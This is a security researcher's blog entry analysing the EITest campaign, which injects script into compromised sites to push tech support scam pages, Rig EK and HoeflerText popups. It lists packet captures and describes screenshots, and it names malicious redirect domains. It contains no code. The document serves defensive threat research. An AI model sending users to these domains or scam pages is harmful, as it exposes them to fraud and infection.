2017-05-30 - EITEST CAMPAIGN PUSHING TECH SUPPORT SCAMS, RIG EK, HOEFLERTEXT POPUPS

ASSOCIATED FILES:

  • 2017-05-29-EITest-script-for-tech-scam-after-amormariano.com.br-UK-based-traffic.pcap   (472,332 bytes)
  • 2017-05-30-EITest-script-for-tech-scam-after-amormariano.com.br-US-based-traffic-1st-run.pcap   (898,744 bytes)
  • 2017-05-30-EITest-script-for-tech-scam-after-amormariano.com.br-US-based-traffic-2nd-run.pcap   (883,541 bytes)
  • 2017-05-29-page-from-amormariano.com.br-with-injected-EITest-script-for-tech-support-scam-UK.txt   (237,041 bytes)
  • 2017-05-29-tech-support-scam-page-UK.mp3   (164,773 bytes)
  • 2017-05-29-tech-support-scam-page-UK.txt   (45,831 bytes)
  • 2017-05-30-page-from-amormariano.com.br-with-injected-EITest-script-for-tech-support-scam-US-1st-run.txt   (237,019 bytes)
  • 2017-05-30-page-from-amormariano.com.br-with-injected-EITest-script-for-tech-support-scam-US-2nd-run.txt   (237,018 bytes)
  • 2017-05-30-tech-support-scam-page-US.mp3   (589,824 bytes)
  • 2017-05-30-tech-support-scam-page-US.txt   (4,978 bytes)

 

NOTES:


Shown above:  Updated my chart, because I saw EITest Rig EK while operating from a US location as my source IP address.

 

CHECKING AN EITEST-COMPROMISED SITE FROM A LOCATION IN THE UNITED STATES (US)


Shown above:  Example of injected script in a page from the compromised website  The highlighted URL leads to a tech support scam page.

 



Shown above:  Examples of the traffic filtered in Wireshark.

 


Shown above:  Screenshot of the tech support scam page (US style).  New phone number today.

 


Shown above:  Screenshot of the tech support scam page with the notification pop-up (US style).

 

CHECKING AN EITEST-COMPROMISED SITE FROM A LOCATION IN THE UNITED KINGDOM (UK)


Shown above:  Injected script in a page from the compromised website.  The highlighted URL leads to a tech support scam page.

 


Shown above:  Traffic filtered in Wireshark.  NOTE: As before, I had to manually copy and paste the gio.aquastring.bid
URL into a browser.  It did not happen automatically.

 


Shown above:  The gio.zenoricher.bid URL redirects to an HTTPS URL.

 


Shown above:  Screenshot of the tech support scam page (UK style).

 


Shown above:  Screenshot of the tech support scam page with the notification pop-up (UK style).

 

INDICATORS

The following are indicators associated with this activity.

 

OTHER PICS


Shown above:  An example of the HoeflerText popup on a site compromised by the EITest campaign.  No binary (Font_Chrome.exe or otherwise) was returned.

 


Shown above:  This is the type of injected EITest script I saw, where I accidentally recorded over the pcap.

 

FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.